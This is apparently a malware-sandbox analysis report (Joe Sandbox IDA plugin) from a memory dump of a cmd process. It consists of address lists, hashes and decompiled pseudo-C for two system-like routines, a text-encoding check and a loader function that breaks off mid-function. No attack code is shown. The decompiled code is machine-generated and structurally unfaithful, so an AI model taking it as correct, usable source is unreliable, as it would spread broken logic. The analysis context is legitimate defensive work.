0x036db0b1
0x036db3f8
0x036db3fa
0x036db3ff
0x036db419
0x036db41b
0x036db41b
0x036db401
0x00000000
0x036db0b7
0x036db0b9
0x036db0bc
0x036db0c0
0x036db0c2
0x036db0c2
0x036db0c4
0x036db0c8
0x036db0cf
0x036db0d1
0x036db0d1
0x036db0da
0x036db0dd
0x036db0df
0x036db0df
0x036db0e4
0x036db0e9
0x036db3e2
0x036db3e5
0x036db3eb
0x0372a676
0x0372a67b
0x0372a67d
0x036db3f1
0x036db3f1
0x036db3f1
0x036db0ef
0x036db0ef
0x036db0ef
0x036db0e9
0x036db0f6
0x036db28d
0x036db28e
0x036db293
0x036db0fc
0x036db0fc
0x036db101
0x036db104
0x036db107
0x036db10c
0x0372a687
0x0372a68d
0x0372a68d
0x0372a687
0x036db112
0x036db116
0x0372a696
0x0372a69c
0x0372a69c
0x0372a696
0x036db120
0x036db121
0x036db124
0x036db127
0x036db12a
0x036db12d
0x036db132
0x0372a6a5
0x00000000
0x00000000
0x0372a6ab
0x00000000
0x036db138
0x036db138
0x036db13a
0x036db193
0x036db197
0x036db19d
0x036db29c
0x036db29f
0x036db2a2
0x036db2a7
0x0372a6d2
0x0372a6d8
0x0372a6d8
0x0372a6d2
0x036db2af
0x036db420
0x036db422
0x036db423
0x00000000
0x036db2b5
0x036db2b5
0x036db2ba
0x0372a6e1
0x0372a6e7
0x0372a6e7
0x0372a6e1
0x036db2c2
0x00000000
0x036db2c8
0x036db2cb
0x036db2d0
0x0372a6f0
0x0372a6f6
0x0372a6f6
0x0372a6f0
0x036db2d8
0x00000000
0x036db2de
0x036db2de
0x036db2de
0x036db2e1
0x036db2e6
0x036db2eb
0x0372a6ff
0x0372a705
0x0372a705
0x0372a6ff
0x036db2f3
0x00000000
0x036db2f9
0x036db2fb
0x036db2fd
0x036db301
0x036db303
0x036db303
0x036db308
0x036db30b
0x036db310
0x036db312
0x036db312
0x036db31c
0x036db322
0x036db327
0x0372a70e
0x036db335
0x036db337
0x0372a71d
0x0372a723
0x0372a723
0x0372a71d
0x036db340
0x036db345
0x036db349
0x0372a72a
0x0372a72a
0x036db352
0x036db357
0x036db359
0x036db359
0x036db365
0x036db367
0x036db36c
0x00000000
0x036db36c
0x0372a714
0x0372a714
0x036db32f
0x036db3b8
0x036db3bd
0x036db3c4
0x036db425
0x036db427
0x036db429
0x036db429
0x036db427
0x036db3c8
0x00000000
0x00000000
0x036db3ce
0x036db42f
0x036db3d0
0x036db3d0
0x036db3d0
0x036db3d7
0x036db3da
0x036db3da
0x00000000
0x036db32f
0x036db2f3
0x036db2d8
0x036db2c2
0x036db2af
0x036db1a3
0x036db1a9
0x036db1af
0x036db1b2
0x036db1b5
0x036db1b8
0x0372a733
0x0372a739
0x0372a739
0x0372a733
0x036db1c0
0x00000000
0x036db1c6
0x036db1c8
0x036db1cb
0x036db1ce
0x036db1d3
0x0372a742
0x0372a748
0x0372a748
0x0372a742
0x036db1db
0x00000000
0x036db1e1
0x036db1e1
0x036db1e6
0x036db1e9
0x036db1ee
0x0372a751
0x036db409
0x036db409
0x036db40e
0x00000000
0x00000000
0x036db410
0x036db22d
0x036db22f
0x0372a790
0x0372a796
0x0372a796
0x0372a790
0x036db23d
0x036db243
0x036db248
0x0372a79f
0x00000000
0x00000000
0x0372a7a5
0x00000000
0x036db24e
0x036db24e
0x036db250
0x036db374
0x036db379
0x036db37e
0x0372a7ae
0x0372a7b4
0x0372a7b4
0x0372a7ae
0x036db386
0x00000000
0x036db38c
0x036db38e
0x0372a7bd
0x036db394
0x036db394
0x036db394
0x036db39b
0x036db39e
0x00000000
0x036db39e
0x036db386
0x036db256
0x036db258
0x0372a7c6
0x0372a7cc
0x0372a7cc
0x0372a7c6
0x036db261
0x036db266
0x036db26a
0x0372a7d3
0x0372a7d3
0x036db273
0x036db278
0x036db27a
0x036db27a
0x036db281
0x036db283
0x036db285
0x036db287
0x036db289
0x00000000
0x036db289
0x036db248
0x0372a757
0x0372a757
0x036db1f6
0x00000000
0x00000000
0x036db1fc
0x036db201
0x0372a760
0x0372a766
0x0372a766
0x0372a760
0x036db209
0x036db3a8
0x0372a76f
0x036db3ae
0x036db3ae
0x036db3ae
0x036db3b0
0x00000000
0x036db20f
0x036db20f
0x036db213
0x0372a778
0x0372a77e
0x0372a77e
0x0372a778
0x036db21b
0x00000000
0x036db221
0x036db223
0x0372a787
0x036db229
0x036db229
0x036db229
0x036db22b
0x00000000
0x036db22b
0x036db21b
0x036db209
0x036db1db
0x036db142
0x036db142
0x036db146
0x036db148
0x036db14c
0x036db14f
0x036db154
0x036db15b
0x0372a6b4
0x00000000
0x00000000
0x0372a6ba
0x0372a6ba
0x036db163
0x00000000
0x00000000
0x00000000
0x036db163
0x036db13a
0x036db169
0x036db16b
0x036db16e
0x036db171
0x036db175
0x036db178
0x0372a6c3
0x0372a6c9
0x0372a6c9
0x0372a6c3
0x036db180
0x036db184
0x00000000
0x036db104
0x036db0f6

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: 5b96f9eae35a514e990d61eabe164f36100de70fbeea8501fbf2183e974fcd54
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: A6D1E732F047158BCB21CE29CA8077ABBE5AF85254B2F81ACDC55CB34DEB71D8429790

Uniqueness

Uniqueness Score: -1.00%

Function 036C0D20 Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E036C0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x37b6d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x37b6920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x37b6920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x36c1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M036C1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x036c0d2b
0x036c0d2e
0x036c0d32
0x036c0d39
0x036c0d3b
0x036c0d3d
0x036c0d3f
0x036c0d46
0x036c0d4d
0x036c0d54
0x036c0d5b
0x036c0d62
0x036c0d69
0x036c0d70
0x036c0d77
0x036c0d7e
0x036c0d85
0x036c0d88
0x036c0d8b
0x036c0d8e
0x036c0d91
0x036c0d94
0x036c0d97
0x036c0d9a
0x036c0d9d
0x036c0da6
0x036c10e9
0x036c10ee
0x036c0db9
0x036c0db9
0x036c0dbc
0x0371e9c7
0x0371e9ca
0x0371e9cd
0x0371e9d0
0x0371e9dd
0x0371e9dd
0x036c0dec
0x036c0dec
0x036c0dee
0x036c0df3
0x036c0ebf
0x036c0ec0
0x00000000
0x036c0df9
0x036c0df9
0x036c0e1e
0x036c0e21
0x036c0e24
0x036c0e27
0x036c0e2a
0x036c0e2d
0x036c0e30
0x036c0e36
0x036c1040
0x036c1043
0x036c1049
0x036c1049
0x036c0e3c
0x036c0e3f
0x036c1007
0x036c100a
0x036c1010
0x036c1010
0x036c100a
0x036c0e3f
0x036c0e58
0x036c0e5d
0x036c1000
0x036c0e63
0x036c0e63
0x036c0e63
0x036c0e67
0x036c0e69
0x036c0e69
0x036c0e6d
0x036c0e70
0x036c0e74
0x036c0e76
0x036c0e76
0x036c0e7a
0x036c0e7c
0x036c0e7c
0x036c0e83
0x036c0e86
0x036c0e87
0x036c0e89
0x036c0e8b
0x036c0e91
0x036c0e00
0x036c0e03
0x036c0e03
0x036c0e07
0x036c0e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x036c0e0f
0x036c0e97
0x036c0e9c
0x036c113e
0x036c1141
0x036c1143
0x036c0eb1
0x036c0eb1
0x036c0eb4
0x036c0eb6
0x036c1110
0x036c1112
0x0371ea25
0x0371ea25
0x036c0ec3
0x036c0ec3
0x036c0ecb
0x036c10fe
0x036c0ed1
0x036c0ed1
0x036c0ed1
0x036c0ed3
0x036c0edb
0x0371ea2d
0x0371ea2f
0x0371ea31
0x00000000
0x00000000
0x00000000
0x00000000
0x0371ea37
0x0371ea37
0x0371ea3a
0x0371ea3e
0x0371ea47
0x0371ea4a
0x0371ea4c
0x0371ea4d
0x0371ea4d
0x0371ea4e
0x0371ea4e
0x0371ea51
0x0371ea52
0x0371ea52
0x00000000
0x036c0ee1
0x036c0ee1
0x036c0ee1
0x036c0ee3
0x036c0ee3
0x036c0ee6
0x036c0eec
0x0371ea5b
0x0371ea5d
0x036c0ef6
0x036c0ef8
0x0371ea6f
0x0371ea6f
0x036c0efe
0x036c0efe
0x036c0f03
0x0371ea7b
0x0371ea7d
0x00000000
0x00000000
0x0371ea83
0x0371ea85
0x00000000
0x00000000
0x0371ea8b
0x0371ea91
0x00000000
0x00000000
0x0371ea97
0x0371ea9a
0x0371eaa0
0x0371eaa2
0x0371eaa2
0x0371eaae
0x0371eab3
0x0371eab6
0x0371eabf
0x0371eaca
0x0371eacd
0x0371ead1
0x0371ead1
0x0371eab8
0x0371eab8
0x0371eab8
0x0371ead2
0x0371ead9
0x036c0f0e
0x036c0f15
0x036c0f17
0x036c0f17
0x036c0f1e
0x036c0f23
0x0371eae1
0x0371eae1
0x036c0f38
0x036c0f3a
0x036c0f3a
0x036c0f49
0x036c1108
0x036c1108
0x036c0f5b
0x036c10c7
0x036c10ca
0x036c10cc
0x00000000
0x00000000
0x036c10dc
0x036c10de
0x00000000
0x00000000
0x00000000
0x036c0f61
0x036c0f61
0x036c0f61
0x036c0f67
0x036c0f6b
0x036c111d
0x036c111d
0x036c0f75
0x036c0f77
0x036c0f77
0x036c0f85
0x036c0f8b
0x036c10b9
0x036c10bc
0x0371eae9
0x0371eae9
0x036c0f91
0x036c0f91
0x036c0f91
0x036c0f96
0x036c0f98
0x036c0f9a
0x036c0f9a
0x036c0fa6
0x036c107c
0x036c107f
0x036c108d
0x00000000
0x036c108d
0x036c1081
0x036c1087
0x0371eaf4
0x0371eafa
0x00000000
0x00000000
0x00000000
0x0371eb00
0x00000000
0x036c0fac
0x036c0fac
0x00000000
0x036c0fac
0x036c0fa6
0x036c0f5b
0x036c0f09
0x036c0f09
0x00000000
0x036c0f09
0x0371ea63
0x00000000
0x0371ea63
0x036c0ef4
0x00000000
0x00000000
0x00000000
0x036c0ef4
0x036c0ebc
0x036c0ebc
0x00000000
0x036c0ebc
0x036c0eb6
0x036c1149
0x036c114c
0x036c114d
0x00000000
0x036c114d
0x036c0ea4
0x036c0ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x036c0fb7
0x036c0fb7
0x036c0fbc
0x036c0fc9
0x036c0fc9
0x036c0fce
0x036c1020
0x036c1025
0x036c1094
0x036c1094
0x036c1099
0x0371ea04
0x0371ea04
0x0371ea09
0x0371ea1c
0x0371ea0b
0x0371ea0b
0x0371ea0e
0x0371ea14
0x0371ea14
0x0371ea0e
0x0371ea09
0x036c1027
0x036c1027
0x036c1155
0x036c102d
0x036c102d
0x036c102d
0x036c1032
0x0371e9fc
0x0371e9fc
0x036c1032
0x036c1027
0x00000000
0x036c1025
0x036c0fd0
0x0371e9f4
0x00000000
0x0371e9f4
0x036c0fd6
0x036c0fd9
0x036c1059
0x036c1059
0x036c105e
0x0371e9ec
0x036c1064
0x036c1064
0x036c1064
0x036c1069
0x036c10ac
0x036c106b
0x036c106b
0x036c106e
0x036c1074
0x036c1074
0x036c106e
0x036c1069
0x00000000
0x036c105e
0x036c0fdb
0x036c10a4
0x00000000
0x036c10a4
0x036c0fe1
0x036c0fe4
0x00000000
0x00000000
0x036c0fea
0x036c0ff1
0x00000000
0x036c0ff8
0x00000000
0x00000000
0x0371e9e4
0x00000000
0x00000000
0x036c1018
0x00000000
0x00000000
0x036c1051
0x00000000
0x00000000
0x00000000
0x00000000
0x036c0ff1
0x036c0fbe
0x036c0fc3
0x00000000
0x00000000
0x00000000
0x036c0fc3
0x036c0df3
0x0371e9d5
0x0371e9d7
0x036c1128
0x036c1128
0x036c112b
0x036c112d
0x036c1133
0x036c1133
0x00000000
0x036c112d
0x00000000
0x0371e9d7
0x036c0dc2
0x036c10f6
0x036c0dd4
0x036c0dd7
0x036c0dda
0x036c0de8
0x036c0de9
0x036c0de9
0x036c0dda
0x00000000
0x036c0dc2
0x036c0dac
0x036c0dae
0x036c0db3
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c7d91d6507e4deccf9275dd6770adeb063966d0662be7fd5be4386d9d2c105
Instruction ID: aa0930343a3f125ace6d18ca8c26c0e55b212b4847071cf8aeba0b3ce8720e9d
Opcode Fuzzy Hash: 84c7d91d6507e4deccf9275dd6770adeb063966d0662be7fd5be4386d9d2c105
Instruction Fuzzy Hash: 35D18E31E24299CBDB28CF9DC6943BDFBB5EB49300F18806DD852A6786D774D982CB44

Uniqueness

Uniqueness Score: -1.00%

Function 036DD5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E036DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x37bd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E036D6600(0x37b52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x37b7b9c; // 0x0
							_t281 = L036E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0370F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x37b7b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x37b7b8c; // 0x2f12b40
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E036E2280(_t200, 0x37b84d8);
									_t277 =  *0x37b85f4; // 0x2f13030
									_t351 =  *0x37b85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2f12fc8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E036DFFB0(_t287, _t353, 0x37b84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0371CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
